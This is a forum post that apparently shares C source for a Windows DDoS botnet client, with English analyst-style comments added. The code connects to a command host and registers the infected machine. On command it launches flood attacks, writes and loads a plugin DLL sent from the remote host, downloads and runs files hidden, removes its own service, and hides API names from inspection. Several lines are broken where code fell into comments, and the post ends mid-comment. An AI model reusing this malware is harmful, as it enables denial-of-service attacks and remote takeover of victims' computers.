本帖最后由 xxyyzz886 于 2012-06-10 12:04:56 编辑


  1.   


    /*
     * GetHttpFile: fetch the beginning of the resource at Url into buf via WinINet.
     *
     * Url      - URL handed to InternetOpenUrl.
     * buf      - caller-supplied buffer; zeroed on entry and again before the read.
     * dwBufLen - size of buf; at most dwBufLen - 1 bytes are requested.
     *
     * Returns buf, or the literal "DOWNFAIL" when the response contains the
     * marker string tested near the end, or NULL when wininet.dll cannot be
     * loaded.
     *
     * Analysis notes:
     *  - The DLL name and the export name are written as char arrays instead of
     *    string literals, presumably to keep them from showing up as ordinary
     *    string constants; string-based triage should not rely on finding
     *    "wininet.dll" / "InternetOpenA" as plain strings.
     *  - Only InternetOpenA is resolved through GetProcAddress here;
     *    InternetOpenUrl, InternetReadFile and InternetCloseHandle are called
     *    by name.
     *  - A single InternetReadFile call is made, so at most one buffer's worth
     *    of the response is returned.
     */
    char* GetHttpFile(char Url[], char *buf, DWORD dwBufLen)
    {
    HMODULE hDll;
    LPVOID hInternet,hUrlHandle; 
    char *pBuf=NULL;
    DWORD dwFlags; memset(buf, 0, dwBufLen);
    pBuf=buf; char strWinNet[] = {'w','i','n','i','n','e','t','.','d','l','l','\0'};
    hDll = LoadLibrary(strWinNet);
    if(hDll)
    {
    typedef LPVOID ( WINAPI * pInternetOpen ) (LPCTSTR ,DWORD ,LPCTSTR ,LPCTSTR ,DWORD );
    pInternetOpen InternetOpen=NULL;
    char strNetOpen[] = {'I','n','t','e','r','n','e','t','O','p','e','n','A','\0'};
    // NOTE(review): the GetProcAddress result is called below without a NULL check.
    InternetOpen = ( pInternetOpen ) GetProcAddress( hDll, strNetOpen);

    // "baidu" is the agent string passed to InternetOpenA.
    hInternet = InternetOpen("baidu",0, NULL, NULL, 0);
    if (hInternet != NULL)
    {
    // NOTE(review): 0x04000000 looks like INTERNET_FLAG_NO_CACHE_WRITE — confirm against wininet.h.
    hUrlHandle = InternetOpenUrl(hInternet, Url, NULL, 0, 0x04000000, 0);
    if (hUrlHandle!= NULL)
    {
    memset(buf,0,dwBufLen);
    // The return value is ignored; dwFlags receives the number of bytes read
    // despite its name. buf stays NUL-terminated because it was zeroed and
    // only dwBufLen - 1 bytes are requested.
    InternetReadFile(hUrlHandle, buf,dwBufLen - 1, &dwFlags);
    InternetCloseHandle(hUrlHandle);
    hUrlHandle = NULL;
    }
    InternetCloseHandle(hInternet);
    hInternet = NULL;
    }
    FreeLibrary(hDll);
    // If nothing was read, pBuf is the zeroed buffer and is returned as an empty string.
    if(strstr(pBuf, "无法找到") != NULL)
    return "DOWNFAIL";
    else
    return pBuf;
    }
    else
    return NULL;
    }
    /*
     * MainConnectCli: open an outbound TCP connection to the "host:port" endpoint
     * stored in modify_data.IpFile.
     *
     * Returns the connected socket, or SOCKET_ERROR when the configured string
     * has no ':' or connect() fails.
     *
     * NOTE(review): host and port are copied into 128-byte arrays with
     * strncpy/strcpy using lengths taken from the input, not from the
     * destination size. socket() is not checked before connect(). buf, nip and
     * nport are declared but unused. resolve() is defined elsewhere.
     */
    SOCKET MainConnectCli()
    {

    // printf("pass2");
    char chIP[128]={0},chPort[128]={0},*ip=NULL;
    char buf[2000];
    //ip=GetHttpFile(modify_data.MainConect,buf, sizeof(buf));// prone to null pointer
    // NOTE(review): in this paste the if(...) test has been pulled into the
    // trailing // comment on the next line, so the braces that follow no
    // longer have a visible condition; the original presumably had the if on
    // its own line.
    ip=modify_data.IpFile;// prone to null pointer if(strstr(ip,":")!=NULL)
    {
    char nip[128]={0},nport[128]={0};
    // Host part: everything before the first ':' (chIP was zero-initialised,
    // so it stays terminated only while the host is shorter than the array).
    strncpy(chIP,ip,strcspn(ip,":"));
    ip=ip+strcspn(ip,":")+1;
    // Port part: the remainder of the string after ':'.
    strcpy(chPort,ip);
    }

    else
    {
    return SOCKET_ERROR;
    }

    struct sockaddr_in LocalAddr;
    LocalAddr.sin_family=AF_INET;
    // htonsT phtons= (htonsT)GetProcAddress(LoadLibrary("ws2_32.dll"),"htons");
    LocalAddr.sin_port=htons(atoi(chPort));
    LocalAddr.sin_addr.S_un.S_addr=resolve(chIP);
    // socketT psocket= (socketT)GetProcAddress(LoadLibrary("ws2_32.dll"),"socket");
    SOCKET MySocket = socket(AF_INET, SOCK_STREAM, 0);
    // connectT pconnect= (connectT)GetProcAddress(LoadLibrary("ws2_32.dll"),"connect");
    if(connect(MySocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
    {
    // closesocketT pclosesocket= (closesocketT)GetProcAddress(LoadLibrary("ws2_32.dll"),"closesocket");
    closesocket(MySocket);
    return SOCKET_ERROR;
    }

    return MySocket;}
    /*
     * ServerConnectCli: like MainConnectCli, but the endpoint may be fetched
     * indirectly. When modify_data.IpFile contains "http" it is treated as a URL,
     * downloaded with GetHttpFile, and the "host:port" string is parsed out of
     * the response; otherwise IpFile itself is parsed as "host:port".
     *
     * Returns the connected socket, or SOCKET_ERROR when connect() fails.
     *
     * For defenders this means the address actually contacted can differ from
     * anything stored in the configuration: the configured URL only points at a
     * page that carries the address.
     *
     * NOTE(review): GetHttpFile can return NULL, and that pointer is passed to
     * strstr unchecked. Unlike MainConnectCli there is no early return when no
     * ':' is found, so the code goes on to connect with empty chIP/chPort. The
     * same unbounded strncpy/strcpy into 128-byte arrays applies. The inner
     * "char *ip" in the else branch shadows the outer one.
     */
    SOCKET ServerConnectCli()
    {
    // printf("pass3");
    char chIP[128]={0},chPort[128]={0},*ip=NULL;
    char buf[2000];

    if(strstr(modify_data.IpFile,"http")!=NULL)
    {
    // Indirect case: download the page and parse "host:port" from its body.
    ip=GetHttpFile(modify_data.IpFile ,buf, sizeof(buf));
    if(strstr(ip,":")!=NULL)
    {
    char nip[128]={0},nport[128]={0};
    strncpy(chIP,ip,strcspn(ip,":"));
    ip=ip+strcspn(ip,":")+1;
    strcpy(chPort,ip);
    }
    }

    else
    {
    // Direct case: IpFile already holds "host:port".
    char *ip=modify_data.IpFile;
    if(strstr(ip,":")!=NULL)
    {
    char nip[128]={0},nport[128]={0};
    strncpy(chIP,ip,strcspn(ip,":"));
    ip=ip+strcspn(ip,":")+1;
    strcpy(chPort,ip);
    }
    }

    struct sockaddr_in LocalAddr;
    LocalAddr.sin_family=AF_INET;
    // htonsT phtons= (htonsT)GetProcAddress(LoadLibrary("ws2_32.dll"),"htons");
    LocalAddr.sin_port=htons(atoi(chPort));
    LocalAddr.sin_addr.S_un.S_addr=resolve(chIP);
    // socket used for the connection
    // socketT psocket= (socketT)GetProcAddress(LoadLibrary("ws2_32.dll"),"socket");
    SOCKET MySocket = socket(AF_INET, SOCK_STREAM, 0);
    // connect pconnect= (connectT)GetProcAddress(LoadLibrary("ws2_32.dll"),"connect");
    if(connect(MySocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
    {
    // closesocketT pclosesocket= (closesocketT)GetProcAddress(LoadLibrary("ws2_32.dll"),"closesocket");
    closesocket(MySocket);
    return SOCKET_ERROR;
    }

    return MySocket;
    }
    /*
     * SetCheckTimeout: turn on TCP keep-alive for socket S.
     *
     * CheckTime is passed as the SO_KEEPALIVE option value (any non-zero value
     * enables the option) and its storage is reused as the bytes-returned
     * output of WSAIoctl. The keep-alive timing itself is fixed below:
     * 3 minutes idle, 10 seconds between probes. The WSAIoctl result is not
     * checked.
     */
    void SetCheckTimeout(SOCKET S,int CheckTime)
    {
    // Set KeepAlive: enable the keep-alive mechanism
    if (setsockopt(S, SOL_SOCKET, SO_KEEPALIVE, (char *)&CheckTime, sizeof(CheckTime)) != 0)
    {
    return;
    }
    // Set the detailed timeout parameters
    tcp_keepalive klive;
    klive.onoff = 1; // enable keep-alive
    klive.keepalivetime = 1000 * 60 * 3;
    klive.keepaliveinterval = 1000 * 10; // retry interval is 10 seconds; resend if no reply
    WSAIoctl
    (
    S, 
    SIO_KEEPALIVE_VALS,
    &klive,
    sizeof(tcp_keepalive),
    NULL,
    0,
    (unsigned long *)&CheckTime,
    0,
    NULL
    ); return;
    /*
     * (Next definition) PlusConnect: hand the peer of socket s to the loaded
     * add-on. Looks up the export "ProcessTrans" in the global hPlusDll and, if
     * present, calls it with the peer's dotted-quad address, its port, and the
     * global g_dwTickcount. Does nothing when the export or the peer address is
     * unavailable.
     */
    }void PlusConnect(SOCKET s)
    {
    LPFNPROCESSTRANS lpfnProcessTrans = (LPFNPROCESSTRANS)GetProcAddress(hPlusDll, "ProcessTrans");
    if (lpfnProcessTrans)
    {
    sockaddr_in sin;
    int ilen = sizeof(sin);
    if (SOCKET_ERROR != getpeername(s, (sockaddr*)&sin, &ilen))
    {
    char addr[64];
    wsprintf(
    addr,
    "%u.%u.%u.%u",
    sin.sin_addr.S_un.S_un_b.s_b1,
    sin.sin_addr.S_un.S_un_b.s_b2,
    sin.sin_addr.S_un.S_un_b.s_b3,
    sin.sin_addr.S_un.S_un_b.s_b4
    );
    lpfnProcessTrans(addr, ntohs(sin.sin_port), g_dwTickcount);
    }
    }
    /*
     * (Next definition) RecvFullData: read exactly datalen bytes from s into buf.
     * Returns TRUE when datalen bytes were received (or datalen is 0), FALSE when
     * select() fails or the peer closes / recv() errors before that.
     *
     * select() is called with a NULL timeout, so the call blocks until data
     * arrives. The caller must guarantee buf has room for datalen bytes; nothing
     * here checks it.
     *
     * NOTE(review): the descriptor placed in the set is the global MainSocket,
     * while the nfds argument, FD_ISSET and recv() use the parameter s. The two
     * agree only when the caller passes MainSocket.
     */
    }BOOL RecvFullData(SOCKET s, char *buf, DWORD datalen)
    {
    int iLen = 0; if (0 == datalen) return TRUE; while(1)
    {
    fd_set FdRead;
    FD_ZERO(&FdRead);
    FD_SET(MainSocket,&FdRead);
    int Er=select(s+1, &FdRead, NULL, NULL, NULL);
    if(Er==SOCKET_ERROR) break; if(Er && FD_ISSET(s,&FdRead))
    {
    int iRet = recv(s, buf + iLen, datalen - iLen, 0);
    if (iRet == 0 || iRet == SOCKET_ERROR) break; iLen += iRet;
    if (iLen >= datalen) break;
    }
    }
    return (iLen == datalen);
    /*
     * (Next definition) LoadM2Addon: load the add-on DLL named "hra<STORM_MIR2>.dll"
     * and resolve its "StartWork" / "StopWork" exports into the globals
     * lpfnStartWork / lpfnStopWork. Returns TRUE only when both exports exist;
     * otherwise the module is unloaded and the file is deleted.
     *
     * The DLL is loaded by bare file name, so the standard DLL search order
     * decides which file is picked up. The "hra%u.dll" name pattern is a
     * file-system artifact worth searching for during triage.
     */
    }BOOL LoadM2Addon()
    {
    TCHAR buf[MAX_PATH];
    BOOL bRet = FALSE; wsprintf(buf, TEXT("hra%u.dll"), STORM_MIR2);
    HMODULE hM2Dll = LoadLibrary(buf);
    if (NULL != hM2Dll)
    {
    lpfnStartWork = (LPFNSTARTWORK)GetProcAddress(hM2Dll, "StartWork");
    lpfnStopWork = (LPFNSTOPWORK)GetProcAddress(hM2Dll, "StopWork");
    if (NULL != lpfnStopWork && NULL != lpfnStartWork)
    {
    bRet = TRUE;
    }
    else
    {
    FreeLibrary(hM2Dll);
    DeleteFile(buf);
    }
    } return bRet;
    /*
     * (Next definition) LoadInfectAddon: load "hra<STORM_INFECT>.dll" by bare file
     * name and report whether LoadLibrary succeeded. No exports are resolved
     * here, so whatever the module does happens from its own entry point.
     * bRet is unused.
     */
    }BOOL LoadInfectAddon()
    {
    TCHAR buf[MAX_PATH];
    BOOL bRet = FALSE;

    wsprintf(buf, TEXT("hra%u.dll"), STORM_INFECT);
    HMODULE hInfectDll = LoadLibrary(buf);
    return (NULL != hInfectDll);
    }
      

  2.   

    // Function-pointer types matching kernel32's GetTempPathA and WriteFile.
    // They are used to call those APIs through GetProcAddress instead of through
    // the import table, so import-table inspection alone will not list them.
    typedef DWORD (WINAPI *GetTempPathAT)
    (
     DWORD nBufferLength,
     LPSTR lpBuffer
     );typedef BOOL (WINAPI *WriteFileT)
    (
    HANDLE hFile,
    LPCVOID lpBuffer,
    DWORD nNumberOfBytesToWrite,
    LPDWORD lpNumberOfBytesWritten,
    LPOVERLAPPED lpOverlapped
     );
    /*
     * ConnectClient: thread routine that connects out through MainConnectCli(),
     * announces itself, then loops reading length-prefixed messages from
     * MainSocket and dispatching on pmh->dwMsgID. lParam is not used in the
     * visible body.
     *
     * Behaviour visible in this listing that is useful for triage and detection:
     *  - the first message sent is a MSGHEAD with dwMsgID = IAMDDOS followed by
     *    a SYSINFO structure;
     *  - STORM_PLUS_INIT streams a file from the peer into "PlusCtrl.dll"
     *    (relative path) and loads it with LoadLibrary;
     *  - STORM_DOWNLOADHIDE / STORM_DOWNLOAD / STORM_UPDATESERVER fetch a
     *    peer-supplied URL into the temp directory with urlmon's
     *    URLDownloadToFileA and start it with WinExec;
     *  - STORM_REMOVE and the update path delete the service named
     *    modify_data.ws_svcname and terminate the process;
     *  - STORM_OPENIEHIDE / STORM_OPENIE start iexplore.exe with a
     *    peer-supplied argument.
     * The handlers DealwithDDoS, DealwithCC, DealwithTS3, GetSysinfo and
     * StormRand are defined elsewhere.
     *
     * NOTE(review): the function is declared DWORD, but the path after the loop
     * ends without a return statement.
     */
    DWORD _stdcall ConnectClient(LPVOID lParam)
    {
    BOOL bRecvFull;
    char Buffer[STORM_MAX];
    BOOL bIsPlusFileData = FALSE;
    DWORD dwFileLength = 0;
    DWORD dwPlusKeyword = 0;
    HANDLE hPlusDllFile = INVALID_HANDLE_VALUE;
    // API names are resolved at run time; "WriteFile" is spelled as a char array.
    // NOTE(review): neither resolved pointer is checked for NULL before use.
    char strWriteFile[] = {'W','r','i','t','e','F','i','l','e','\0'};
    WriteFileT   pWriteFile =   (WriteFileT)GetProcAddress(LoadLibrary("kernel32.dll"), strWriteFile);
    GetTempPathAT   pGetTempPathA =   (GetTempPathAT)GetProcAddress(LoadLibrary("kernel32.dll"),"GetTempPathA");
    MainSocket=MainConnectCli();
    if(MainSocket==SOCKET_ERROR)
    {
    return 0;
    }
    // MainSocket=ServerConnectCli();
    SetCheckTimeout(MainSocket,75); MSGHEAD *pmh = (MSGHEAD *)Buffer;
    SYSINFO sysinfo;
    memset(&sysinfo, 0, sizeof(SYSINFO));
    GetSysinfo(&sysinfo);
    // Each add-on that loads successfully is advertised in sysinfo.dwFeature.
    if (TRUE == LoadM2Addon())
    {
    sysinfo.dwFeature += SIF_MIR2;
    } if (TRUE == LoadInfectAddon())
    {
    sysinfo.dwFeature += SIF_INFECT;
    }
    // Registration message: MSGHEAD (length + IAMDDOS id) followed by SYSINFO.
    pmh->dwMsgLength = sizeof(SYSINFO);
    pmh->dwMsgID=IAMDDOS;
    memcpy(Buffer + sizeof(MSGHEAD),&sysinfo,sizeof(SYSINFO)); if(send(MainSocket,Buffer, sizeof(MSGHEAD) + pmh->dwMsgLength,0)==SOCKET_ERROR)
    {
    closesocket(MainSocket);
    return 0;
    }
    // "urlmon.dll" / "URLDownloadToFileA", again spelled as char arrays.
    char strUrlMon[] = {'u','r','l','m','o','n','.','d','l','l','\0'};
    char strUrlDown[] = {'U','R','L','D','o','w','n','l','o','a','d','T','o','F','i','l','e','A','\0'};
    while(1)
    {
    memset(Buffer, 0, sizeof(Buffer));
    // Header mode reads one MSGHEAD; file mode reads up to a buffer of file data.
    UINT nRet = (FALSE == bIsPlusFileData) ? sizeof(MSGHEAD) : min(dwFileLength, sizeof(Buffer));
    // Must receive the complete data before returning; otherwise treat it as an error!
    bRecvFull = RecvFullData(MainSocket, Buffer, nRet);
    if(FALSE == bRecvFull)
    {
    closesocket(MainSocket);
    break;
    }
    // Currently receiving the remote-control file, or it is already loaded: keep receiving file data
    else if (TRUE == bIsPlusFileData)
    {
    DWORD dwWrittenBytes = 0;
    // Data is written only while no add-on is loaded and the file is open;
    // otherwise it is read from the socket and discarded.
    if (NULL == hPlusDll && INVALID_HANDLE_VALUE != hPlusDllFile)
    {
    if (FALSE == pWriteFile(hPlusDllFile, Buffer, (DWORD)nRet, &dwWrittenBytes, NULL) || dwWrittenBytes != (DWORD)nRet)
    {
    CloseHandle(hPlusDllFile);
    hPlusDllFile = INVALID_HANDLE_VALUE;
    }
    }
    dwFileLength -= (DWORD)nRet; if (0 == dwFileLength)
    {
    bIsPlusFileData = FALSE;
    if (NULL == hPlusDll && INVALID_HANDLE_VALUE != hPlusDllFile)
    {
    // Transfer complete: the file just received from the peer is loaded
    // into this process by bare file name.
    CloseHandle(hPlusDllFile);
    hPlusDllFile = INVALID_HANDLE_VALUE; hPlusDll = LoadLibrary("PlusCtrl.dll");
    }
    if (hPlusDll) PlusConnect(MainSocket);
    }
    }
    else
    {
    pmh = (MSGHEAD *)Buffer;
    // NOTE(review): dwMsgLength comes from the peer and is not compared with the
    // space left in Buffer (STORM_MAX) before this read.
    bRecvFull = RecvFullData(MainSocket, Buffer + sizeof(MSGHEAD), pmh->dwMsgLength);
    if(FALSE == bRecvFull)
    {
    closesocket(MainSocket);
    break;
    }
    // Payload views: pci and pAddData alias the same bytes after the header;
    // pcistrdata points just past the UCMDINFO fields.
    UCMDINFO *pci = (UCMDINFO *)(Buffer + sizeof(MSGHEAD));
    char *pAddData = (char *)(Buffer + sizeof(MSGHEAD));
    char *pcistrdata = pAddData + sizeof(UCMDINFO);
    switch(pmh->dwMsgID)
    {
    case STORM_PLUS_INIT:
    {
    // Start of an add-on transfer: the first DWORD of the payload is the file length.
    bIsPlusFileData = TRUE;
    dwFileLength = *(DWORD*)pAddData;
    // NOTE(review): nRet still holds the header size read at the top of the
    // loop; what the subtraction of 8 is meant to represent is not clear
    // from this listing. nRet is unsigned, so "nRet > 0" is false only for 0.
    nRet -= 8;
    if (hPlusDll)
    {
    if (nRet > 0) dwFileLength -= (DWORD)nRet;
    break;
    }
    hPlusDllFile = CreateFile("PlusCtrl.dll", GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, 0, NULL);
    if (nRet > 0)
    {
    DWORD dwWrittenBytes = 0;
    if (INVALID_HANDLE_VALUE != hPlusDllFile)
    {
    if (FALSE == pWriteFile(hPlusDllFile, pAddData + sizeof(DWORD), (DWORD)nRet, &dwWrittenBytes, NULL) || dwWrittenBytes != (DWORD)nRet)
    {
    CloseHandle(hPlusDllFile);
    hPlusDllFile = INVALID_HANDLE_VALUE;
    }
    }
    dwFileLength -= (DWORD)nRet;
    }
    break;
    } case STORM_DDOS:
    {
    // Copies the peer-supplied parameters into the global ddosinfo and hands
    // them to DealwithDDoS (defined elsewhere).
    lstrcpyn(ddosinfo.ip, pcistrdata,sizeof(ddosinfo.ip));
    ddosinfo.port = pci->port;
    ddosinfo.thread = pci->thread;
    ddosinfo.time = pci->time;
    ddosinfo.flag = pci->flag;
    DealwithDDoS(&ddosinfo);
    break;
    }
    case STORM_TS1:
    {
    // Payload layout read here: two DWORD counters, then two consecutive
    // NUL-terminated strings (dns, data).
    ccinfo.port = pci->port;
    ccinfo.thread = pci->thread;
    ccinfo.time = pci->time;
    ccinfo.flag = pci->flag;
    ccinfo.count1 = *(DWORD*)&pcistrdata[0];
    ccinfo.count2 = *(DWORD*)&pcistrdata[4];
    lstrcpyn(ccinfo.dns, &pcistrdata[8], sizeof(ccinfo.dns));
    lstrcpyn(ccinfo.data, &pcistrdata[8] + lstrlen(ccinfo.dns) + 1, sizeof(ccinfo.data));
    DealwithCC(&ccinfo);
    break;
    }
    case STORM_TS3:
    {
    // Payload layout read here: two consecutive NUL-terminated strings (ip, data).
    lstrcpyn(ts3info.ip, pcistrdata, sizeof(ts3info.ip));
    lstrcpyn(ts3info.data, pcistrdata + lstrlen(ts3info.ip) + 1, sizeof(ts3info.data));
    ts3info.port = pci->port;
    ts3info.thread = pci->thread;
    ts3info.time = pci->time;
    ts3info.flag = pci->flag;
    DealwithTS3(&ts3info);
    break;
    }
    case STORM_MIR2:
    {
    // Forwarded to the add-on's StartWork export; ignored when the add-on is not loaded.
    if (NULL == lpfnStartWork) break; char *mir2ip, *mir2say;
    mir2ip = pcistrdata;
    mir2say = mir2ip + lstrlen(mir2ip) + 1;
    lpfnStartWork(
    mir2ip, pci->port,
    mir2say,
    pci->thread,
    pci->time
    );
    break;
    }
    case STORM_STOP:
    {
    // Sets the global stop flag and, if present, calls the add-on's StopWork.
    IsStop=1;
    if (NULL != lpfnStopWork)
    {
    lpfnStopWork();
    }
    break;
    }
    case STORM_REMOVE:
    {
    // Self-removal: release the instance mutex, delete the service entry,
    // reset the attributes of the running executable, then exit.
    // NOTE(review): scm and service are neither checked nor closed. There is
    // no break; the case relies on pExitProcess not returning.
    SetFileAttributesAT   pSetFileAttributesA =   (SetFileAttributesAT)GetProcAddress(LoadLibrary("kernel32.dll"),"SetFileAttributesA");
    ExitProcessT   pExitProcess =   (ExitProcessT)GetProcAddress(LoadLibrary("kernel32.dll"),"ExitProcess");
    HANDLE hMutex = OpenMutex(0x1F0001,0,modify_data.ws_svcname);// 0x1F0001 is hard-coded
    GetLastError();// this statement is pointless
    if (hMutex)
    {
    ReleaseMutex(hMutex);
    CloseHandle(hMutex);
    }
    char Servername[256];
    SC_HANDLE service, scm;
    scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
    service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
    DeleteService(service);
    char gggggg[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'};
    GetModuleFileNameAT   pGetModuleFileNameA =   (GetModuleFileNameAT)GetProcAddress(LoadLibrary("kernel32.dll"),gggggg); pGetModuleFileNameA(NULL,Servername,256);
    pSetFileAttributesA(Servername, FILE_ATTRIBUTE_NORMAL);
    pExitProcess(0);
    }
    case STORM_DOWNLOADHIDE:
    {
    // Download-and-run: the payload (pAddData) is used as the URL; the target
    // is a file in the temp directory named from timeGetTime().
    char myFILE[MAX_PATH]={0},FileName[128]={0};
    pGetTempPathA(MAX_PATH,myFILE);
    //wsprintf(FileName, "%d", GetTickCount());
    wsprintf(FileName, "%d", timeGetTime());
    // NOTE(review): in this paste the lstrcat and the hurlmon declaration sit
    // inside the // comment on the next line, so as shown FileName is never
    // appended to myFILE and hurlmon is undeclared; the original presumably
    // had them on separate lines.
    //wsprintf(FileName,"%c%c%c%c%c.exe",'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26)); lstrcat(myFILE, FileName); HMODULE hurlmon;
    hurlmon=LoadLibrary(strUrlMon); void (WINAPI *DOWNFILE)  (void*, LPCSTR, LPCSTR, DWORD, void*);
    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon, strUrlDown); DOWNFILE(0, pAddData, myFILE,10,NULL);
    // Under this case label dwMsgID is STORM_DOWNLOADHIDE, so the ternary
    // presumably always selects SW_HIDE.
    WinExec(myFILE,(pmh->dwMsgID == STORM_DOWNLOAD) ? SW_SHOW : SW_HIDE);
    break;
    }
    case STORM_DOWNLOAD: 
    case STORM_UPDATESERVER:
    {
    // Replace-self path: download the peer-supplied URL to
    // <temp>\bpk?????cn.exe (five characters built from 'a' + StormRand(26)),
    // delete the current service entry, start the new file hidden, and exit.
    // On download failure the case just breaks.
    // close the mutex
    HANDLE hMutex = OpenMutex(0x1F0001,0,modify_data.ws_svcname); if (hMutex)
    {
    ReleaseMutex(hMutex);
    CloseHandle(hMutex);
    }
    char myFILE[MAX_PATH]={0},FileName[128]={0};
    pGetTempPathA(MAX_PATH,myFILE);
    wsprintf(FileName,"bpk%c%c%c%c%ccn.exe",'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26),'a'+StormRand(26));
    lstrcat(myFILE, FileName); HMODULE hurlmon; hurlmon=LoadLibrary(strUrlMon); HRESULT (WINAPI *DOWNFILE)  (void*, LPCSTR, LPCSTR, DWORD, void*);
    (FARPROC&)DOWNFILE= GetProcAddress(hurlmon, strUrlDown); HRESULT hr=DOWNFILE(0, pAddData, myFILE,10,NULL);
    if(hr!=S_OK)
    break; SC_HANDLE service, scm;
    scm = OpenSCManager(0, 0,SC_MANAGER_CREATE_SERVICE);
    service = OpenService(scm, modify_data.ws_svcname,SERVICE_ALL_ACCESS | DELETE);
    DeleteService(service); WinExec(myFILE,SW_HIDE);
    ExitProcess(0);
    }
    case STORM_OPENIEHIDE:
    {
    // Starts iexplore.exe hidden with the payload as its argument.
    ShellExecute(NULL,"open","iexplore.exe", pAddData,NULL,SW_HIDE);
    break;
    }
    case STORM_OPENIE:
    {
    // Same as above, but with a visible window.
    ShellExecute(GetDesktopWindow(),"open","iexplore.exe", pAddData,NULL,SW_SHOWNORMAL);
    break;
    }
    case STORM_HEART:// heartbeat: nothing to do
    break;
    }
    }
    }
    // NOTE(review): both break paths out of the loop have already closed
    // MainSocket, so this is a second closesocket on the same value.
    closesocket(MainSocket);
    if (hPlusDllFile != INVALID_HANDLE_VALUE)
    {
    CloseHandle(hPlusDllFile);
    }
    }
      

  3.   


    /*
     * DecryptData: in-place single-byte transform over nLen bytes at szRec.
     * Each byte has p subtracted and is then XORed with p, where p is one byte
     * derived from key.
     *
     * The cast binds before the arithmetic, so p is
     * ((unsigned char)key % 400) - 50 truncated to unsigned char; the % 400 has
     * no effect on a value that is already below 256. Since only the low byte
     * of key matters, there are at most 256 distinct transforms.
     */
    void DecryptData(unsigned char *szRec, unsigned long nLen, unsigned long key)
    {
    // printf("pass1");
    unsigned long i;
    unsigned char p; p = (unsigned char ) key % 400 -50; for(i = 0; i < nLen; i++) 
    {
    *szRec -= p;
    *szRec ^= p;
    // *szRec += p;
    szRec++;
    }
    /*
     * (Next definition) DeleteMe: move the running executable to
     * <temp>\SOFTWARE.LOG and, if that succeeds, register the moved file for
     * deletion at the next reboot (MoveFileEx with a NULL destination and
     * MOVEFILE_DELAY_UNTIL_REBOOT).
     *
     * Forensic note: delayed moves are recorded by Windows under the Session
     * Manager PendingFileRenameOperations value, and the SOFTWARE.LOG file
     * remains in the temp directory until the reboot happens.
     *
     * NOTE(review): the resolved GetModuleFileNameA pointer is not checked, and
     * lstrcat appends to a MAX_PATH buffer without a length check.
     */
    }void DeleteMe()
    {
    char gggggg[] = {'G','e','t','M','o','d','u','l','e','F','i','l','e','N','a','m','e','A','\0'};
    GetModuleFileNameAT   pGetModuleFileNameA =   (GetModuleFileNameAT)GetProcAddress(LoadLibrary("kernel32.dll"),gggggg);    char szCurPath[MAX_PATH] = {0};
        pGetModuleFileNameA(NULL,   szCurPath,   sizeof(szCurPath));

    char strTempPath[MAX_PATH];
    GetTempPath(MAX_PATH, strTempPath);
    lstrcat(strTempPath, "SOFTWARE.LOG");

        if (MoveFileEx(szCurPath, strTempPath, MOVEFILE_REPLACE_EXISTING | MOVEFILE_COPY_ALLOWED))
    {
    MoveFileEx(strTempPath, NULL, MOVEFILE_DELAY_UNTIL_REBOOT | MOVEFILE_REPLACE_EXISTING);
    }
    }
    // What follows is the service wrapper. No need to worry about it much: the author
    // did not know how to comment it, and the format is fixed.
    /*
     * service_is_exist: report whether the registry key
     * HKLM\SYSTEM\CurrentControlSet\Services\<modify_data.ws_svcname> can be
     * opened.
     *
     * NOTE(review): the key is opened with KEY_ALL_ACCESS although it is only
     * probed, so the check also fails for a caller without full rights; the
     * opened hKey is never closed. The service name is appended to a MAX_PATH
     * buffer without a length check.
     */
    static BOOL service_is_exist()
    {
    char SubKey[MAX_PATH]={0};
    lstrcpy(SubKey,"SYSTEM\\CurrentControlSet\\Services\\");
    lstrcat(SubKey,modify_data.ws_svcname);

    HKEY hKey;
    if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,SubKey,0L,KEY_ALL_ACCESS,&hKey) == ERROR_SUCCESS)
    return TRUE;
    else
    return FALSE;
    // File-scope service state shared with SvcCtrlFnct below.
    }static SERVICE_STATUS srvStatus;
    static SERVICE_STATUS_HANDLE hSrv;
    /*
     * SvcCtrlFnct: service control callback (presumably registered as the
     * control handler elsewhere). For STOP, SHUTDOWN, PAUSE and CONTINUE it
     * reports the matching *_PENDING state, sleeps 500 ms, then sets the final
     * state; every path ends by reporting srvStatus once more. Other control
     * codes only re-report the current status.
     */
    static void __stdcall SvcCtrlFnct(DWORD CtrlCode)
    {
    switch(CtrlCode)
    {
    case SERVICE_CONTROL_STOP:
    srvStatus.dwCheckPoint=1;
    srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
    SetServiceStatus(hSrv,&srvStatus);
    Sleep(500);
    srvStatus.dwCheckPoint=0;
    srvStatus.dwCurrentState=SERVICE_STOPPED;
    break;
    case SERVICE_CONTROL_SHUTDOWN:
    srvStatus.dwCheckPoint=1;
    srvStatus.dwCurrentState=SERVICE_STOP_PENDING;
    SetServiceStatus(hSrv,&srvStatus); Sleep(500);
    srvStatus.dwCheckPoint=0;
    srvStatus.dwCurrentState=SERVICE_STOPPED;
    break;
    case SERVICE_CONTROL_PAUSE:
    srvStatus.dwCheckPoint=1;
    srvStatus.dwCurrentState=SERVICE_PAUSE_PENDING;
    SetServiceStatus(hSrv,&srvStatus);
    Sleep(500);
    srvStatus.dwCheckPoint=0;
    srvStatus.dwCurrentState=SERVICE_PAUSED;
    break;
    case SERVICE_CONTROL_CONTINUE:
    srvStatus.dwCheckPoint=1;
    srvStatus.dwCurrentState=SERVICE_CONTINUE_PENDING;
    SetServiceStatus(hSrv,&srvStatus);
    Sleep(500);
    srvStatus.dwCheckPoint=0;
    srvStatus.dwCurrentState=SERVICE_RUNNING;
    break;
    }
    SetServiceStatus(hSrv,&srvStatus);
    /*
     * (Next definition) EnumResNameProc: EnumResourceNames callback. For each
     * resource it is called with, it locates and locks the resource data and
     * writes it to a file named "hra<name>.dll" in the current directory,
     * overwriting any existing file. Always returns TRUE so enumeration
     * continues.
     *
     * lpszName is formatted with %u, i.e. it is treated as an integer resource
